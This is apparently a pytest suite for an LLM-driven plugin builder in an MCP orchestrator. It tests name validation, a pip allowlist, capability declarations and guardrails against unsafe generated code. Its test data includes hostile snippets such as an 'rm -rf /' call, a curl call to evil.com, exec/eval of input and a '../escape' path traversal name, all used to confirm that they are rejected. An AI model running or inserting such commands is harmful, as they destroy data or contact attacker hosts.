"""
Plugin builder MCP plugin tests — Issue #30.

The builder is a meta-plugin: its tools generate other MCP plugins from a
natural-language description, install pip deps, run an in-process smoke test,
and register the result with the live MCPOrchestrator.

All side effects (LLM call, pip install, smoke runner, filesystem write) are
injected so unit tests run hermetically — no real LLM calls, no real
`pip install`, no real subprocess, no real file I/O outside a tmp dir.
"""
import asyncio
import json
import sys
import textwrap
from pathlib import Path

import pytest

sys.path.insert(0, str(Path(__file__).parent.parent.parent))

from cerebral.mcp.orchestrator import MCPOrchestrator, Plugin, Tool, ToolResult
from cerebral.security import Decision


# ---------------------------------------------------------------------------
# Auto-allow consent surface (Issue #51 — every builder install now consumes
# `code_install` via the orchestrator's consent surface; tests that aren't
# specifically exercising the prompt path inject this fake so the gate
# resolves to SILENT without ceremony).
# ---------------------------------------------------------------------------


class _AutoAllowConsent:
    """Duck-typed ConsentSurface that auto-allows every prompt."""

    def __init__(self) -> None:
        self.received: list[dict] = []

    async def request(self, capability, tool_name, args, flags=None):
        self.received.append({
            "capability": capability,
            "tool_name": tool_name,
            "args": dict(args or {}),
            "flags": flags,
        })
        return Decision.SILENT

    def set_acl(self, acl) -> None:
        pass


def _make_orc():
    """Test-default orchestrator with an auto-allow consent surface."""
    return MCPOrchestrator(consent=_AutoAllowConsent())


# ---------------------------------------------------------------------------
# Fixtures — minimal generated plugin payload returned by the LLM
# ---------------------------------------------------------------------------

_GENERATED_SERVER = textwrap.dedent('''
    """Generated by builder."""
    from cerebral.mcp.orchestrator import Tool, ToolResult

    PLUGIN_NAME = "weatherbug"
    REQUIRED_CAPABILITIES = frozenset({"external_data_read"})


    class WeatherbugPlugin:
        name = PLUGIN_NAME

        def list_tools(self):
            return [
                Tool(
                    name="weatherbug_ping",
                    description="Returns 'pong' - a self-contained smoke test target.",
                    plugin=PLUGIN_NAME,
                    schema={"type": "object", "properties": {}},
                )
            ]

        async def call_tool(self, tool_name, args):
            if tool_name == "weatherbug_ping":
                return ToolResult(content="pong")
            return ToolResult(content=f"Unknown tool: {tool_name}", is_error=True)


    def create():
        return WeatherbugPlugin()
''').strip()

_GENERATED_README = "# weatherbug\n\nGenerated by Felix's plugin builder.\n"

_GENERATED_PAYLOAD = {
    "name": "weatherbug",
    "server_py": _GENERATED_SERVER,
    "readme_md": _GENERATED_README,
    "pip_deps": [],
    "smoke_tool": "weatherbug_ping",
    "smoke_args": {},
    # Issue #44 — builder payload must include the declared capabilities.
    "required_capabilities": ["external_data_read"],
    # Issue #51 — and a user-facing description for the install prompt.
    "description": "Reports a single pong message — minimal smoke target.",
}


def _make_llm_fn(payload=None):
    """Returns a fake llm_fn that yields a single canned payload."""
    payload = payload or _GENERATED_PAYLOAD

    def llm_fn(description, suggested_name=None):
        # Honour suggested_name override so callers can disambiguate
        if suggested_name and suggested_name != payload["name"]:
            return {**payload, "name": suggested_name}
        return dict(payload)

    return llm_fn


def _make_recording_pip(success=True):
    calls = []

    def pip_install_fn(dep):
        calls.append(dep)
        if not success:
            raise RuntimeError(f"pip install {dep} failed")

    return pip_install_fn, calls


def _make_recording_smoke(passes=True):
    calls = []

    async def smoke_runner_fn(plugin, tool_name, args):
        calls.append((plugin.name, tool_name, args))
        if not passes:
            raise RuntimeError("smoke test failed: tool raised TypeError")
        result = await plugin.call_tool(tool_name, args)
        if result.is_error:
            raise RuntimeError(f"smoke tool returned error: {result.content}")
        return result

    return smoke_runner_fn, calls


# ---------------------------------------------------------------------------
# Cycle 1 — happy path: create writes files, installs deps, runs smoke, registers
# ---------------------------------------------------------------------------


class TestBuilderCreateHappyPath:
    @pytest.mark.asyncio
    async def test_create_writes_server_and_readme(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool(
            "builder_create",
            {"description": "A weather bug. Just respond pong."},
        )
        assert not result.is_error, result.content

        server_py = tmp_path / "weatherbug" / "server.py"
        readme_md = tmp_path / "weatherbug" / "README.md"
        assert server_py.is_file(), "server.py should be written to plugins/<name>/"
        assert readme_md.is_file(), "README.md should be written alongside server.py"
        assert "WeatherbugPlugin" in server_py.read_text()

    @pytest.mark.asyncio
    async def test_create_calls_pip_install_for_each_declared_dep(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, pip_deps=["requests", "beautifulsoup4"])
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests", "beautifulsoup4"),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert pip_calls == ["requests", "beautifulsoup4"]

    @pytest.mark.asyncio
    async def test_create_runs_smoke_test_against_generated_plugin(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert len(smoke_calls) == 1
        plugin_name, tool_name, args = smoke_calls[0]
        assert plugin_name == "weatherbug"
        assert tool_name == "weatherbug_ping"
        assert args == {}

    @pytest.mark.asyncio
    async def test_create_registers_with_orchestrator_on_smoke_pass(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        tool_names = [t.name for t in orc.list_tools()]
        assert "weatherbug_ping" in tool_names
        # And it routes correctly:
        ping = await orc.call_tool("weatherbug_ping", {})
        assert ping.content == "pong"

    @pytest.mark.asyncio
    async def test_create_returns_plugin_name_and_tool_count(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        data = json.loads(result.content)
        assert data["name"] == "weatherbug"
        assert data["tool_count"] == 1
        assert data["registered"] is True


# ---------------------------------------------------------------------------
# Cycle 2 — name validation and collision rejection
# ---------------------------------------------------------------------------


class TestBuilderNameValidation:
    @pytest.mark.asyncio
    @pytest.mark.parametrize(
        "bad_name",
        [
            "Weather",  # uppercase
            "weather-bug",  # dash
            "weather.bug",  # dot
            "../escape",  # path traversal
            "weather/bug",  # slash
            "1weather",  # leading digit
            "",  # empty
            "weather bug",  # space
        ],
    )
    async def test_invalid_names_rejected(self, tmp_path, bad_name):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, name=bad_name)
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "name" in result.content.lower()
        # Nothing was installed, smoke-tested, or written:
        assert pip_calls == []
        assert smoke_calls == []
        # Empty/path-traversal names normalize to tmp_path itself, so skip the
        # existence check there — we already verified is_error and no side effects.
        if bad_name and "/" not in bad_name and ".." not in bad_name:
            assert not (tmp_path / bad_name).exists()

    @pytest.mark.asyncio
    async def test_existing_plugin_directory_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Pre-existing plugin dir
        (tmp_path / "weatherbug").mkdir()
        (tmp_path / "weatherbug" / "server.py").write_text("# already here")

        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "exists" in result.content.lower()
        assert smoke_calls == []
        # Existing file untouched:
        assert (tmp_path / "weatherbug" / "server.py").read_text() == "# already here"

    @pytest.mark.asyncio
    async def test_existing_flat_plugin_file_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Pre-existing flat-style plugin
        (tmp_path / "weatherbug.py").write_text("PLUGIN_NAME = 'weatherbug'\n")

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "exists" in result.content.lower()


# ---------------------------------------------------------------------------
# Cycle 3 — smoke-test failure leaves the world clean
# ---------------------------------------------------------------------------


class TestBuilderSmokeFailure:
    @pytest.mark.asyncio
    async def test_smoke_failure_does_not_register(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke(passes=False)
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "smoke" in result.content.lower()
        assert "weatherbug" not in [p.name for p in orc._plugins.values()]

    @pytest.mark.asyncio
    async def test_smoke_failure_does_not_persist_plugin_files(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke(passes=False)
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        await builder.call_tool("builder_create", {"description": "x"})
        assert not (tmp_path / "weatherbug").exists(), (
            "Failed builds must not leave files in plugins/"
        )

    @pytest.mark.asyncio
    async def test_smoke_failure_returns_error_message_with_reason(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke(passes=False)
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        # Surface the underlying RuntimeError text so the user can debug:
        assert "TypeError" in result.content or "smoke" in result.content.lower()


# ---------------------------------------------------------------------------
# Cycle 4 — pip-install failures and allowlist enforcement
# ---------------------------------------------------------------------------


class TestBuilderPipInstall:
    @pytest.mark.asyncio
    async def test_pip_install_failure_aborts_creation(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, pip_deps=["requests"])
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip(success=False)

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "pip" in result.content.lower() or "install" in result.content.lower()
        assert smoke_calls == [], "Smoke test should not run when pip install fails"
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_dep_outside_allowlist_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Dep not in allowlist
        payload = dict(_GENERATED_PAYLOAD, pip_deps=["sketchy-malware-package"])
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests", "beautifulsoup4"),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "allowlist" in result.content.lower() or "not permitted" in result.content.lower()
        assert pip_calls == [], "Disallowed deps must not be installed"

    @pytest.mark.asyncio
    async def test_dep_with_version_pin_matches_allowlist(self, tmp_path):
        """`requests==2.31.0` should pass when `requests` is in the allowlist."""
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, pip_deps=["requests==2.31.0"])
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, pip_calls = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
            pip_allowlist=("requests",),
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert pip_calls == ["requests==2.31.0"]


# ---------------------------------------------------------------------------
# Cycle 5 — generated-code security guardrails
# ---------------------------------------------------------------------------


class TestBuilderCodeGuardrails:
    @pytest.mark.asyncio
    async def test_missing_PLUGIN_NAME_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        bad_server = textwrap.dedent('''
            class P:
                name = "x"
                def list_tools(self): return []
                async def call_tool(self, t, a): pass

            def create(): return P()
        ''').strip()

        payload = dict(_GENERATED_PAYLOAD, server_py=bad_server)
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "PLUGIN_NAME" in result.content

    @pytest.mark.asyncio
    async def test_missing_create_function_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        bad_server = textwrap.dedent('''
            PLUGIN_NAME = "weatherbug"
            class P:
                name = "weatherbug"
                def list_tools(self): return []
                async def call_tool(self, t, a): pass
        ''').strip()

        payload = dict(_GENERATED_PAYLOAD, server_py=bad_server)
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "create" in result.content.lower()

    @pytest.mark.asyncio
    @pytest.mark.parametrize(
        "dangerous_snippet",
        [
            "import os; os.system('rm -rf /')",
            "from os import system",
            "__import__('os').system('curl evil.com')",
            "exec(input())",
            "eval(user_input)",
        ],
    )
    async def test_dangerous_patterns_rejected(self, tmp_path, dangerous_snippet):
        from plugins.builder import BuilderPlugin

        bad_server = textwrap.dedent(f'''
            PLUGIN_NAME = "weatherbug"
            from cerebral.mcp.orchestrator import Tool, ToolResult

            {dangerous_snippet}

            class P:
                name = PLUGIN_NAME
                def list_tools(self): return []
                async def call_tool(self, t, a): return ToolResult(content="")
            def create(): return P()
        ''').strip()

        payload = dict(_GENERATED_PAYLOAD, server_py=bad_server)
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "unsafe" in result.content.lower() or "forbidden" in result.content.lower()
        assert smoke_calls == [], "Unsafe code must never reach the smoke runner"
        assert not (tmp_path / "weatherbug").exists()


# ---------------------------------------------------------------------------
# Cycle 6 — list_generated and re-run smoke
# ---------------------------------------------------------------------------


class TestBuilderListGenerated:
    @pytest.mark.asyncio
    async def test_list_generated_empty_initially(self, tmp_path):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=_make_orc(),
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )

        result = await builder.call_tool("builder_list_generated", {})
        assert not result.is_error
        data = json.loads(result.content)
        assert data["generated"] == []

    @pytest.mark.asyncio
    async def test_list_generated_returns_only_builder_created_plugins(self, tmp_path):
        from plugins.builder import BuilderPlugin

        # Pre-existing flat plugin (should NOT appear)
        (tmp_path / "ambient.py").write_text("PLUGIN_NAME='ambient'\n")

        builder = BuilderPlugin(
            orchestrator=_make_orc(),
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )

        await builder.call_tool("builder_create", {"description": "x"})

        result = await builder.call_tool("builder_list_generated", {})
        data = json.loads(result.content)
        assert "weatherbug" in data["generated"]
        assert "ambient" not in data["generated"]


# ---------------------------------------------------------------------------
# Cycle 7 — tool list shape
# ---------------------------------------------------------------------------


class TestBuilderToolList:
    def test_all_tools_prefixed_with_builder(self):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=_make_orc(),
            plugins_dir=Path("/tmp/x"),
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )
        tools = builder.list_tools()
        assert len(tools) >= 2
        for tool in tools:
            assert tool.name.startswith("builder_"), (
                f"All builder tools must be prefixed with 'builder_' (#23 LEARNINGS) — "
                f"got {tool.name!r}"
            )

    def test_create_tool_in_list(self):
        from plugins.builder import BuilderPlugin

        builder = BuilderPlugin(
            orchestrator=_make_orc(),
            plugins_dir=Path("/tmp/x"),
            llm_fn=_make_llm_fn(),
            pip_install_fn=_make_recording_pip()[0],
            smoke_runner_fn=_make_recording_smoke()[0],
        )
        names = [t.name for t in builder.list_tools()]
        assert "builder_create" in names
        assert "builder_list_generated" in names


# ---------------------------------------------------------------------------
# Cycle 8 — orchestrator subdir discovery (so generated plugins survive restarts)
# ---------------------------------------------------------------------------


class TestSubdirDiscovery:
    def test_discover_plugins_loads_subdir_server_py(self, tmp_path):
        """Plugins generated as plugins/<name>/server.py auto-load on next discovery."""
        sub = tmp_path / "weatherbug"
        sub.mkdir()
        (sub / "server.py").write_text(_GENERATED_SERVER)

        orc = _make_orc()
        orc.discover_plugins(tmp_path)

        names = [p.name for p in orc._plugins.values()]
        assert "weatherbug" in names

    def test_discover_plugins_loads_both_flat_and_subdir(self, tmp_path):
        """Mixing plugins/foo.py and plugins/bar/server.py both load."""
        # Flat plugin
        flat = tmp_path / "flatone.py"
        flat.write_text(_GENERATED_SERVER.replace("weatherbug", "flatone").replace(
            "WeatherbugPlugin", "FlatPlugin"
        ))
        # Subdir plugin
        sub = tmp_path / "subbed"
        sub.mkdir()
        (sub / "server.py").write_text(_GENERATED_SERVER.replace(
            "weatherbug", "subbed"
        ).replace("WeatherbugPlugin", "SubbedPlugin"))

        orc = _make_orc()
        orc.discover_plugins(tmp_path)
        names = sorted(p.name for p in orc._plugins.values())
        assert "flatone" in names
        assert "subbed" in names

    def test_discover_plugins_skips_subdir_without_server_py(self, tmp_path):
        """A bare subdir without server.py is silently skipped (no crash)."""
        (tmp_path / "_cache").mkdir()
        (tmp_path / "empty_subdir").mkdir()

        orc = _make_orc()
        orc.discover_plugins(tmp_path)  # should not raise
        assert orc._plugins == {}


# ---------------------------------------------------------------------------
# Cycle 9 — REQUIRED_CAPABILITIES in the builder pipeline (Issue #44)
# ---------------------------------------------------------------------------


class TestBuilderRequiredCapabilities:
    @pytest.mark.asyncio
    async def test_missing_required_capabilities_in_payload_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = {k: v for k, v in _GENERATED_PAYLOAD.items() if k != "required_capabilities"}
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "required_capabilities" in result.content
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_unknown_capability_in_payload_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, required_capabilities=["fs_read", "telepathy"])
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "telepathy" in result.content
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()

    @pytest.mark.asyncio
    async def test_builder_injects_constant_when_llm_omits_it(self, tmp_path):
        """If the LLM emits server.py without REQUIRED_CAPABILITIES, the
        builder prepends a deterministic declaration from the payload so the
        plugin survives a Cerebral restart."""
        from plugins.builder import BuilderPlugin

        server_without_constant = textwrap.dedent('''
            from cerebral.mcp.orchestrator import Tool, ToolResult

            PLUGIN_NAME = "weatherbug"

            class WeatherbugPlugin:
                name = PLUGIN_NAME
                def list_tools(self):
                    return [Tool(name="weatherbug_ping", description="d", plugin=PLUGIN_NAME)]
                async def call_tool(self, tool_name, args):
                    return ToolResult(content="pong")

            def create():
                return WeatherbugPlugin()
        ''').strip()

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=server_without_constant,
            required_capabilities=["fs_read", "external_data_read"],
        )
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content

        written = (tmp_path / "weatherbug" / "server.py").read_text()
        assert "REQUIRED_CAPABILITIES" in written
        assert "external_data_read" in written
        assert "fs_read" in written

    @pytest.mark.asyncio
    async def test_builder_passes_capabilities_to_orchestrator_on_register(self, tmp_path):
        from plugins.builder import BuilderPlugin

        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert orc.required_capabilities_for("weatherbug") == frozenset(
            {"external_data_read"}
        )

    @pytest.mark.asyncio
    async def test_payload_with_non_iterable_required_capabilities_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(_GENERATED_PAYLOAD, required_capabilities=123)
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        assert "required_capabilities" in result.content
        assert not (tmp_path / "weatherbug").exists()


# ---------------------------------------------------------------------------
# Cycle 10 — AST-completeness check is mandatory in the builder pipeline
# (Issue #47).
#
# Static-pattern inspectability (#46) catches dangerous primitives. The AST
# walker (#47) catches *under-declaration*: a generated plugin that walks
# `shutil.rmtree(...)` but declares only `fs_read` is clean against the
# static scan but missing a `fs_delete` declaration. The builder runs the
# check on the staged source before persisting; on failure no files are
# moved into `plugins/<name>/` and the orchestrator is not asked to
# register.
# ---------------------------------------------------------------------------


def _under_declared_server_py() -> str:
    """A generated plugin that contains an `os.remove` call site in a
    helper function — the static AST walker sees it, but the smoke runner
    doesn't execute it (smoke runs `weatherbug_ping` which returns pong).
    The point of the test is that the AST check fires regardless of
    runtime reachability."""
    return textwrap.dedent('''
        """Generated by builder."""
        import os
        from cerebral.mcp.orchestrator import Tool, ToolResult

        PLUGIN_NAME = "weatherbug"
        REQUIRED_CAPABILITIES = frozenset({"external_data_read"})


        def _drop_cache(path):
            # Reachable by the AST walker; never called by the smoke tool.
            os.remove(path)


        class WeatherbugPlugin:
            name = PLUGIN_NAME

            def list_tools(self):
                return [
                    Tool(
                        name="weatherbug_ping",
                        description="d",
                        plugin=PLUGIN_NAME,
                        schema={"type": "object", "properties": {}},
                    )
                ]

            async def call_tool(self, tool_name, args):
                if tool_name == "weatherbug_ping":
                    return ToolResult(content="pong")
                return ToolResult(content=f"Unknown tool: {tool_name}", is_error=True)


        def create():
            return WeatherbugPlugin()
    ''').strip()


class TestBuilderAstCompleteness:
    @pytest.mark.asyncio
    async def test_under_declared_call_site_rejected(self, tmp_path):
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=_under_declared_server_py(),
            required_capabilities=["external_data_read"],
        )
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert result.is_error
        # Failure message names the offending call + the missing class.
        assert "os.remove" in result.content
        assert "fs_delete" in result.content
        # Side effect protection: smoke runner never fired (the AST check
        # gates BEFORE the smoke run), no files moved into plugins_dir,
        # nothing registered.
        assert smoke_calls == []
        assert not (tmp_path / "weatherbug").exists()
        assert "weatherbug" not in {p for p in orc._plugins}

    @pytest.mark.asyncio
    async def test_complete_declaration_passes_and_registers(self, tmp_path):
        """Same source, declaration extended to include fs_delete — the
        check passes and the rest of the pipeline runs as before."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            server_py=_under_declared_server_py(),
            required_capabilities=["external_data_read", "fs_delete"],
        )
        orc = _make_orc()
        smoke_fn, smoke_calls = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content
        assert smoke_calls == [("weatherbug", "weatherbug_ping", {})]
        assert (tmp_path / "weatherbug" / "server.py").exists()
        assert orc.required_capabilities_for("weatherbug") == frozenset(
            {"external_data_read", "fs_delete"}
        )

    @pytest.mark.asyncio
    async def test_over_declared_passes(self, tmp_path):
        """A payload that declares more than the AST walker can detect from
        the source is fine — over-declaration is intentional. The default
        `_GENERATED_SERVER` has no flagged calls; declaring extra classes
        beyond `external_data_read` must not trip the check."""
        from plugins.builder import BuilderPlugin

        payload = dict(
            _GENERATED_PAYLOAD,
            required_capabilities=[
                "external_data_read",
                "fs_read",
                "fs_write",
                "clipboard",
            ],
        )
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
            llm_fn=_make_llm_fn(payload),
            pip_install_fn=pip_fn,
            smoke_runner_fn=smoke_fn,
        )

        result = await builder.call_tool("builder_create", {"description": "x"})
        assert not result.is_error, result.content

    @pytest.mark.asyncio
    async def test_syntax_error_in_generated_source_surfaces_cleanly(self, tmp_path):
        """If the LLM emits malformed Python, the AST check raises
        SyntaxError. The builder catches and reports — does NOT crash the
        plugin and does NOT persist files."""
        from plugins.builder import BuilderPlugin

        broken_source = textwrap.dedent('''
            from cerebral.mcp.orchestrator import Tool, ToolResult
            PLUGIN_NAME = "weatherbug"
            REQUIRED_CAPABILITIES = frozenset({"external_data_read"})
            def create():
                return None
            def half_open(:  # syntax error
        ''').strip()
        payload = dict(_GENERATED_PAYLOAD, server_py=broken_source)
        orc = _make_orc()
        smoke_fn, _ = _make_recording_smoke()
        pip_fn, _ = _make_recording_pip()

        builder = BuilderPlugin(
            orchestrator=orc,
            plugins_dir=tmp_path,
